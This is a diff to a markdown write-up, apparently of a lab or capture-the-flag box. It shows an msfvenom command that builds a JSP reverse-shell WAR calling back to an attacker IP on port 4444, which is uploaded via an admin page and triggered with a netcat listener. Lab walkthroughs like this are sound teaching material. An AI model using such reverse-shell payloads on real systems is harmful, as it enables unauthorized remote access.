Swammers8/swammers8.github.io/assets/llpe/writeup.md

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.207 LPORT=4444 -f war > shell.war
 ```

-We can see it on the admin page:
+Once uploaded we can see it on the admin page:

 ![image.png](image%206.png)

-And I simply started a listener, and clicked on the shell link:
+Then I started a simple netcat listener, and clicked on the shell link:

 ![image.png](image%207.png)